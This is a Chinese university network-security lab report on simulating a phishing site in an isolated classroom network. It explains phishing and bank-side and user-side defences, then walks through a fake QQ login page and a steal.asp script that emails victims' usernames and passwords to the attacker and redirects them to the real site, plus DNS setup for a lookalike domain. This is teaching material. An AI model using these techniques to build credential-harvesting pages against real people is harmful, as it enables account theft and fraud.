實驗三網(wǎng)站釣魚攻擊 實驗報告

...wd......wd......wd...南京工程學(xué)院實驗報告題目網(wǎng)站釣魚攻擊課程名稱網(wǎng)絡(luò)與信息安全技術(shù)院〔系、部、中心〕計算機工程學(xué)院專業(yè)網(wǎng)絡(luò)工程班級學(xué)生姓名學(xué)號設(shè)計地點信息樓A216指導(dǎo)教師毛云貴實驗時間2014年3月20日實驗成績一實驗?zāi)康?.了解釣魚攻擊的概念和實現(xiàn)原理

2.了解釣魚網(wǎng)站和正常網(wǎng)站的區(qū)別

3.提高抵御釣魚攻擊的能力二實驗環(huán)境Windows，交換網(wǎng)絡(luò)構(gòu)造，UltraEdit三實驗原理3.1．什么是釣魚網(wǎng)站

網(wǎng)絡(luò)釣魚是通過大量發(fā)送聲稱來自于銀行或其他知名機構(gòu)的欺騙性垃圾郵件，意圖引誘收信人給出敏感信息〔如用戶名、口令、帳號ID、ATMPIN碼或信用卡詳細信息〕的一種攻擊方式。最典型的網(wǎng)絡(luò)釣魚攻擊將收信人引誘到一個通過精心設(shè)計與目標(biāo)組織的網(wǎng)站非常相似的釣魚網(wǎng)站上，并獲取收信人在此網(wǎng)站上輸入的個人敏感信息，通常這個攻擊過程不會讓受害者警覺。這些個人信息對黑客們具有非常大的吸引力，因為這些信息使得他們可以假冒受害者進展欺詐性金融交易，從而獲得經(jīng)濟利益。受害者經(jīng)常遭受嚴(yán)重的經(jīng)濟損失或個人信息被竊取。

釣魚網(wǎng)站通常偽裝成為銀行網(wǎng)站，竊取訪問者提交的賬號和密碼信息。它一般通過電子郵件傳播，此類郵件中包含一個經(jīng)過偽裝的鏈接，該鏈接將收件人鏈接到釣魚網(wǎng)站。釣魚網(wǎng)站的頁面與真實網(wǎng)站界面完全一致，要求訪問者提交賬號和密碼。一般來說釣魚網(wǎng)站構(gòu)造很簡單，只是一個或幾個頁面，URL和真實網(wǎng)站有細微差異，如真實的工行網(wǎng)站為icbc.cn，針對工行的釣魚網(wǎng)站則可能為1cbc.cn。

3.2．釣魚網(wǎng)站的防范措施

1.啟用專用域名

現(xiàn)在的網(wǎng)址有好幾種，xxx是一個商業(yè)性網(wǎng)站，而是政府網(wǎng)站，則是非政府組織網(wǎng)站。域名不同，代表的意思也不同。因此可以借鑒政府網(wǎng)站有專用域名做法，為網(wǎng)上銀行設(shè)置專用域名。這種作法雖然從根本上無法杜絕釣魚網(wǎng)站的存在，但確實在很大程度上打擊了假冒的網(wǎng)銀網(wǎng)站。

2.標(biāo)準(zhǔn)搜索引擎

在網(wǎng)銀安全問題上，銀行惟一能采取的方法就是投入大量的人力物力，不連續(xù)地在網(wǎng)上通過人工或是自動搜索同自己域名類似的假冒網(wǎng)站、網(wǎng)絡(luò)實名，甚至必須介入電子郵件搜索是否有人假借銀行名義行欺騙之實，即使是幾個銀行聯(lián)合起來打假，平攤的只是本錢，技術(shù)始終是個難題。因此可以標(biāo)準(zhǔn)搜索引擎，從搜索引擎層面上來干預(yù)與網(wǎng)上銀行域名類似的網(wǎng)站。

3.銀行數(shù)字證書

銀行可以通過使用銀行證書的方式來驗明網(wǎng)上銀行的正身，只有擁有正確的證書才能證明該網(wǎng)站是正確的網(wǎng)上銀行而不是釣魚網(wǎng)站。

4.客戶安全使用網(wǎng)銀

〔1〕防止使用搜索引擎

從正規(guī)銀行網(wǎng)點取得網(wǎng)絡(luò)銀行網(wǎng)址并牢記，登錄網(wǎng)銀時盡量防止使用搜索引擎或網(wǎng)絡(luò)實名，以免混淆視聽。

〔2〕設(shè)置混合密碼、雙密碼

密碼設(shè)置應(yīng)防止與個人資料相關(guān)，建議選用數(shù)字、字母混合密碼，提高密碼破解難度并妥善保管，交易密碼盡量與信用卡密碼不同。

〔3〕定期查看交易記錄

定期查看網(wǎng)銀辦理的轉(zhuǎn)帳和支付等業(yè)務(wù)記錄，或通過短信定制賬戶變動通知，隨時掌握賬戶變動情況。

〔4〕妥善保管數(shù)字證書

防止在公用計算機上使用網(wǎng)銀，以防數(shù)字證書等機密資料落入他人之手。

〔5〕警覺電子郵件鏈接

網(wǎng)上銀行一般不會通過電子郵件發(fā)出“系統(tǒng)維護、升級〞提示，假設(shè)遇重大事件，系統(tǒng)必須暫停服務(wù)，銀行會提前公告顧客。一旦發(fā)現(xiàn)資料被盜，應(yīng)立即修改相關(guān)交易密碼或進展銀行卡掛失。

三．釣魚網(wǎng)站的關(guān)鍵源碼分析

釣魚網(wǎng)站的位置:“C:\ExpNIS\SocEng-Lab\Fishing\釣魚網(wǎng)站\qqqet〞，用UltraEdit-32可查看或編輯源碼。

釣魚網(wǎng)站構(gòu)造比擬簡單，主要組成局部其實就是兩個文件index.htm，steal.asp。index.htm為釣魚網(wǎng)站的前臺表現(xiàn)頁面，steal.asp為釣魚網(wǎng)站的后臺控制程序。具體分析一下這兩個文件。

1.index.htm文件

用戶使用域名“qqqet.qq〞登錄釣魚網(wǎng)站后，進入的頁面就是index.htm，該頁是釣魚網(wǎng)站的表現(xiàn)頁面，其主要完成表單提交，用戶信息是否為空的驗證，驗證用戶信息不為空的話，就將用戶輸入的信息傳入steal.asp。頁面源碼中很多都是為頁面的表現(xiàn)形式，表現(xiàn)效果服務(wù)的，這些源碼不做分析。下面分析一下關(guān)鍵代碼：上行代碼解析:

〔1〕“name〞是表單的名稱，這里給該表單命名為“form1〞。

〔2〕“onsubmit="returncheckinput()"〞是提交表單之前執(zhí)行的方法，在下一大段代碼中會具體介紹checkinput()方法。

〔3〕“action=steal.asp〞是提交表單后跳轉(zhuǎn)的文件，這里是跳轉(zhuǎn)到steal.asp。

〔4〕“method=post〞是表單提交方法，該方法有兩種，一種是post，一種是get。post是隱含參數(shù)提交，就是提交的時候url中不顯示用戶名，密碼信息。get是顯示參數(shù)提交，就是提交的時候url中顯示用戶名，密碼信息。上段代碼大局部都是效果和表現(xiàn)形式，關(guān)鍵的局部用粗體字代替。這段代碼是建設(shè)一個文本輸入框，“type=text〞是給輸入框的類型定義為文本形式，“name=u〞是將文本輸入框的名稱定義為“u〞,“u.value〞就是文本框輸入的內(nèi)容。上段代碼是建設(shè)一個密碼輸入框，“type=password〞是給輸入框定義為密碼形式，“name=p〞是將密碼輸入框的名稱定義為“p〞,“p.value〞就是密碼框輸入的內(nèi)容。上段代碼的意思是建設(shè)一個登錄的按鈕，用于提交用戶信息的。表單局部的代碼中onsubmit="returncheckinput()"〞，它的意思是調(diào)用下面這段代碼。上段代碼解析:

〔1〕“if(document.form1.u.value=="")〞if條件判斷，“document.form1.u.value〞是取得文本框中內(nèi)容，也就是QQ號碼，對它進展判斷，判斷它的內(nèi)容是不是空值，如果是空值，就執(zhí)行下面{}中的內(nèi)容。

〔2〕“alert("您還沒有輸入QQ號碼")〞alert是彈出對話框，對話框的內(nèi)容是“您還沒有輸入QQ號碼〞。

〔3〕“document.form1.u.focus()〞將鼠標(biāo)焦點定位到文本框的位置。

〔4〕“returnfalse〞返回值是“false〞，即不提交表單內(nèi)容，返回“index.htm〞。

2.steal.asp文件

用戶提交表單后，將用戶信息傳入steal.asp中，在steal.asp中進展業(yè)務(wù)邏輯處理。

具體處理的內(nèi)容：將用戶信息以郵件的形式發(fā)送到指定郵箱，彈出誤導(dǎo)對話框，引導(dǎo)到正常網(wǎng)站。關(guān)鍵代碼解析：上段代碼解析：代碼中引用VBScript腳本語言，“u=request.form("u")〞在該頁取得表單提交的文本框內(nèi)容，即QQ號碼，定義為“u〞，“p=request.form("p")〞在該頁取得表單提交的密碼框內(nèi)容，即QQ密碼，定義為“p〞。下面這段代碼是引用vbs腳本，功能是負發(fā)送郵件(將用戶輸入的內(nèi)容，以郵件的形式發(fā)送到指定郵箱)。上段關(guān)鍵代碼解析：

〔1〕“NameSpace="://schemas.microsoft/cdo/configuration/"〞定義NameSpace命名空間。

〔2〕“SetEmail=CreateObject("CDO.Message")〞開啟郵件服務(wù)。

〔3〕“Email.From="anyone@CServer.NetLab"〞郵件發(fā)送方的郵箱。

〔4〕“Email.To="xxxxx@CServer.NetLab"〞郵件接收方的郵箱。

〔5〕“Email.Subject="usernameandpassword"〞發(fā)送郵件的主題。

〔6〕“Email.Textbody="username:"&u&""&

"password:"&p〞發(fā)送郵件的具體內(nèi)容，即username:“用戶的QQ號碼〞，password:“用戶的QQ密碼〞。

〔7〕“Item(NameSpace&"smtpserver")="54"〞接收郵件的服務(wù)器。

〔8〕“Item(NameSpace&"smtpauthenticate")=0〞設(shè)置郵件發(fā)送者是否為匿名用戶發(fā)送，設(shè)置為0則為匿名用戶發(fā)送，假設(shè)設(shè)置為0則不用設(shè)置“Email.From〞的郵箱(發(fā)送者的郵箱)。設(shè)置為1則為真實存在的用戶發(fā)送，發(fā)送者的郵箱，郵箱的用戶名，密碼必須是真實存在的，即“Email.From〞，“Item(NameSpace&"sendusername")〞，“Item(NameSpace&"sendpassword")〞必須設(shè)置真實存在的郵箱名，郵箱用戶名，郵箱密碼。此處作為攻擊用，必須設(shè)置為0。

〔9〕“Item(NameSpace&"sendusername")="any"〞和“Item(NameSpace&"sendpassword")="any"〞郵件發(fā)送者的郵箱用戶名，因為“Item(NameSpace&"smtpauthenticate")〞設(shè)置為0，所以這兩句腳本沒用到，用'注釋掉了。

〔10〕“Update〞將上面設(shè)置的內(nèi)容在程序執(zhí)行的時候更新確認。

〔11〕“Email.Send〞郵件發(fā)送出去。

下面的代碼主要是欺騙誤登錄釣魚網(wǎng)站的用戶，將用戶引導(dǎo)到正常網(wǎng)站。

上段代碼很多處都是html標(biāo)簽，用于網(wǎng)頁顯示。關(guān)鍵代碼是javascript局部，解析如下：

〔1〕“alert("用戶名或密碼輸入錯誤!")〞彈出提示對話框，對話框內(nèi)容是“用戶名或密碼輸入錯誤！〞。

〔2〕“window.location="://qqpet.qq";〞將用戶引導(dǎo)到正常網(wǎng)站，用的是javascript中“window.location〞方法。用法就是window.location=“要跳轉(zhuǎn)到的地址〔域名或ip地址〕〞。

釣魚網(wǎng)站關(guān)鍵的源碼分析完畢，正常網(wǎng)站的源碼只有一個index.htm文件，和釣魚網(wǎng)站中的index.htm文件類似，不做具體分析。

四實驗方法及步驟本練習(xí)主機A、B、C為一組，D、E、F為一組，下面以主機A、B、C為例，說明實驗步驟實驗主機實驗角色主機A釣魚網(wǎng)站，黑客主機B正常網(wǎng)站，DNS服務(wù)器主機C被欺騙者首先使用“快照X〞恢復(fù)Windows系統(tǒng)環(huán)境。一．初始化環(huán)境的準(zhǔn)備

1．主機A的操作〔1〕主機A配置OutlookExpress郵箱，建設(shè)郵件帳戶〔參見附錄A-OutlookExpress配置方法〕。這里以“user1A@CServer.NetLab〞郵箱為例說明實驗步驟?！?〕更改釣魚網(wǎng)站源碼中接收郵件的郵箱〔源碼分析詳見實驗原理〕。進入釣魚網(wǎng)站目錄“C:\ExpNIS\SocEng-Lab\Fishing\釣魚網(wǎng)站\qqqet〞，點擊右鍵使用UltraEdit翻開steal.asp，如圖4-1所示：圖4-1

郵件發(fā)送源碼

將上圖中標(biāo)記內(nèi)容，更改為主機A配置好的郵箱，保存后退出。

〔3〕發(fā)布釣魚網(wǎng)站。單擊“開場〞|“程序〞|“管理工具〞|“Internet信息服務(wù)〔IIS〕管理器〞，啟動釣魚網(wǎng)站。

「注」啟動釣魚網(wǎng)站之前要先關(guān)閉默認網(wǎng)站和正常網(wǎng)站，默認網(wǎng)站，釣魚網(wǎng)站，正常網(wǎng)站端口號都是80，只允許開啟一個網(wǎng)站。

〔4〕主機A配置DNS服務(wù)器為主機B的ip。

2．主機B的操作

〔1〕安裝DNS，具體步驟：

●

點擊“開場〞|“設(shè)置〞|“控制面板〞|“添加或刪除程序〞|“添加/刪除Windows組件(A)〞，彈出“Windows組件向?qū)Ж暤拇翱冢诮M件中將鼠標(biāo)焦點定位到“網(wǎng)絡(luò)服務(wù)〞的選項上，如圖4-2所示：圖4-2

Windows組件向?qū)?/p>

●

點擊“詳細信息〞，然后在網(wǎng)絡(luò)服務(wù)的子組件中選擇域名系統(tǒng)〔DNS〕，選擇后點擊“確定〞。

●

點擊“下一步〞，進入安裝界面，約2秒后，彈出所需文件窗口，點擊“瀏覽〞，進入到“C:\ExpNIS\SocEng-Lab\Tools\DNS安裝組件〞，選擇DNSMGR.DL_，點擊“翻開〞。然后點擊“確定〞，安裝過程中會出現(xiàn)“Windows文件保護〞的提示對話框，如圖4-3所示：圖4-3

DNS組件安裝過程

將此對話框關(guān)閉，繼續(xù)點擊“瀏覽〞，還是進入到“C:\ExpNIS\SocEng-Lab\Tools\DNS安裝組件〞，選擇DNSMGMT.MS_，點擊“翻開〞，然后再點擊“確定〞，安裝即將完成的時候會彈出“可選網(wǎng)絡(luò)組件〞的提示對話框，如圖4-4所示：圖4-4

可選網(wǎng)絡(luò)組件對話框〔2〕配置DNS，具體步驟：

●

單擊“開場〞|“程序〞|“管理工具〞|“DNS〞，進入DNS配置界面，點擊主機展開樹，如圖4-5所示：圖4-5

DNS配置●

右鍵點擊“正向查找區(qū)域〞，選擇新建區(qū)域，彈出新建區(qū)域向?qū)Вc擊“下一步〞，然后選擇默認的主要區(qū)域，繼續(xù)點擊“下一步〞。

●

在區(qū)域名稱處填寫“qqpet.qq〞，一直點擊擊“下一步〞，最后點擊“完成〞。

●

右鍵點擊“qqpet.qq〞，選擇新建主機，彈出新建主機的窗口，在名稱處填寫“www〞，在ip地址處填寫“主機B的IP地址〞〔此域名為正常網(wǎng)站的域名，根據(jù)角色分配得知，正常網(wǎng)站存在于主機B中〕，點擊“添加主機〞，彈出成功添加主機記錄的對話框，點擊“確定〞，再點擊“完成〞就成功創(chuàng)立了主機。

●

根據(jù)上面的方法，再新建一個區(qū)域名為“qqqet.qq〞的區(qū)域，并在這個區(qū)域中新建名為“www〞的主機，ip地址為主機A的IP地址〔此域名為釣魚網(wǎng)站的域名，根據(jù)角色分配得知，釣魚網(wǎng)站存在于主機A中〕。

〔3〕發(fā)布正常網(wǎng)站。翻開IIS，啟動正常網(wǎng)站。

「注」啟動正常網(wǎng)站之前要先關(guān)閉釣魚網(wǎng)站和默認網(wǎng)站，默認網(wǎng)站，釣魚網(wǎng)站，正常網(wǎng)站端口號都是80，只允許開啟一個網(wǎng)站。

3．主機C的操作

主機C配置DNS服務(wù)器為主機B的IP地址。

二．釣魚式手法模擬

1．主機C登錄釣魚網(wǎng)站

假設(shè)主機C誤輸入，造成主機C進入到釣魚網(wǎng)站。主機C在瀏覽器中使用域名“qqqet.qq〞，登錄到釣魚網(wǎng)站，仔細觀察頁面信息和域名信息。

2．主機C在釣魚網(wǎng)站輸入相關(guān)信息

主機C在釣魚網(wǎng)站中輸入QQ號碼和QQ密碼，QQ號碼：123456。QQ密碼：admin，〔此用戶名和密碼均為正確的，在正常網(wǎng)站中使用會有所表達〕，單擊“登錄〞，之后會彈出一個對話框〞用戶名或密碼錯誤〞，“確定〞后會引導(dǎo)到正常網(wǎng)站。同時剛剛輸入的QQ號碼和QQ密碼會以郵件的形式發(fā)送到主機A的郵箱。

3．主機C在正常網(wǎng)站輸入相關(guān)信息

主機C跳轉(zhuǎn)到正常網(wǎng)站后，仔細觀察域名和頁面信息。觀察后得知，和釣魚網(wǎng)站相比，頁面信息沒什么變化，只是域名發(fā)生了細微的變化，“qqqet.qq〞變成了“qqpet.qq〞，如果不仔細觀察，很難發(fā)現(xiàn)這一點。主機C繼續(xù)操作，QQ號碼輸入“123456〞，QQ密碼輸入“admin〞，登錄后會有登錄成功的提示。

4．主機A登錄郵箱，查看郵件

主機A登錄OutlookExpress郵箱，翻開收到的新郵件，內(nèi)容是主機C在釣魚網(wǎng)站輸入的QQ號碼和QQ密碼，比照一下主機C記錄的QQ號碼和QQ密碼。

5．主機A登錄正常網(wǎng)站

主機A用域名“qqpet.qq〞登錄正常網(wǎng)站，用釣到的“主機C的用戶信息〞進展登錄。

6．主機C的防范方法

用戶應(yīng)該注意提高自己的安全意識，不要通過搜索引擎、匿名郵件、陌生等提供的網(wǎng)址訪問網(wǎng)上銀行等，要注意對域名信息的仔細區(qū)分，以防止不慎訪問釣魚網(wǎng)站。